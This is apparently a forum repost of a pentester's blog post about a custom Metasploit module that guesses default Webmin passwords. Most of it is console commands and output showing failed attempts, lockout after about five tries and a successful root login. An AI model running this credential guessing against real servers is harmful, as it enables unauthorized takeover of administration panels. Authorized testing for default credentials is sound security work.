Jump to content
Fi8sVrs

Webmin Brute Forcing

By Fi8sVrs, in Tutoriale in engleza

Recommended Posts

  • Active Members
Fi8sVrs Rookie

Fi8sVrs

Posted
  • Active Members
Posted

So i ran across a bunch of webmin boxes on a pentest. I went to just go try http_login or some other spiffy Metasploit auxiliary module but nothing was working quite right. I ended up needing to write my own because i had about 60+ hosts to check and that just tedious enough to make you write code and not manually do it.

At least one gotcha i discovered is that webmin will block the IP after four or five (usually 5) attempts. I believe the default is 300 seconds it will also supposedly increase the delay if the same host keeps hitting it.

I took the approach to throw 5 passwords at it, if its not something super obvious then i'd move along. maybe not the best solution but i wanted to make sure it wasn't root/root or webmin/webmin and move on.

msf auxiliary(webmin_login_brute) > set RHOSTS 192.168.1.1
RHOSTS => 192.168.1.1
smsf auxiliary(webmin_login_brute) > set RPORT 10000
RPORT => 10000
smsf auxiliary(webmin_login_brute) > set SSL TRUE
SSL => TRUE
msf auxiliary(webmin_login_brute) > set BLANK_PASSWORDS false

BLANK_PASSWORDS => false
setmsf auxiliary(webmin_login_brute) > set USER_AS_PASS false
USER_AS_PASS => false
set msf auxiliary(webmin_login_brute) > set USERNAME root
USERNAME => root
msf auxiliary(webmin_login_brute) > set PASS_FILE /root/.msf4/data/wordlists/webmin_defaults.txt

PASS_FILE => /root/.msf4/data/wordlists/webmin_defaults.txt
msf auxiliary(webmin_login_brute) > run

[*] Verifying login exists at http://192.168.1.1:10000/session_login.cgi
[*] http://192.168.1.1:10000/session_login.cgi - Webmin - Attempting authentication
[*] 192.168.1.1:10000 WEBMIN - [1/6] - /session_login.cgi - Webmin - Trying username:'root' with password:''
[-] 192.168.1.1:10000 WEBMIN - [1/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:''
[*] 192.168.1.1:10000 WEBMIN - [2/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'root' 
[-] 192.168.1.1:10000 WEBMIN - [2/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'root'
[*] 192.168.1.1:10000 WEBMIN - [3/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'webmin'
[-] 192.168.1.1:10000 WEBMIN - [3/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'webmin'
[*] 192.168.1.1:10000 WEBMIN - [4/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password'

[-] 192.168.1.1:10000 WEBMIN - [4/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'password'
[*] 192.168.1.1:10000 WEBMIN - [5/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'letmein'
[-] 192.168.1.1:10000 WEBMIN - [5/6] - /session_login.cgi 403 - Webmin - We got blocked
[*] 192.168.1.1:10000 WEBMIN - [6/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password1'
[-] 192.168.1.1:10000 WEBMIN - [6/6] - /session_login.cgi 403 - Webmin - We got blocked
[*] Scanned 1 of 1 hosts (100% complete)

and looks like this when it works

[*] Verifying login exists at http://10.0.0.25:12321/session_login.cgi
[*] http://10.0.0.25:12321/session_login.cgi - Webmin - Attempting authentication
[*] 10.0.0.25:12321 WEBMIN - [1/6] - /session_login.cgi - Webmin - Trying username:'root' with password:''
[-] 10.0.0.25:12321 WEBMIN - [1/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:''
[*] 10.0.0.25:12321 WEBMIN - [2/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'root'
[-] 10.0.0.25:12321 WEBMIN - [2/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'root'
[*] 10.0.0.25:12321 WEBMIN - [3/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'webmin'
[-] 10.0.0.25:12321 WEBMIN - [3/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'webmin'
[*] 10.0.0.25:12321 WEBMIN - [4/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password'
[+] http://10.0.0.25:12321/session_login.cgi - Webmin - Login Successful 302 with 'root':'password' Redirect to->https://10.0.0.25:12321/
[*] 10.0.0.25:12321 WEBMIN - [5/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'letmein'
[-] 10.0.0.25:12321 WEBMIN - [5/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'letmein'
[*] 10.0.0.25:12321 WEBMIN - [6/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password1'
[-] 10.0.0.25:12321 WEBMIN - [6/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'password1'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

** note you have to unset the PASSWORD value too, for some reason its populating with a blank password and trying that which sucks if you only have five chances.

Code is here

https://github.com/carnal0wnage/metasploit-framework/blob/webminmodule/modules/auxiliary/scanner/http/webmin_login.rb

figured i'd let the blog serve as way to let people test prior to doing a pull request.

Source

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...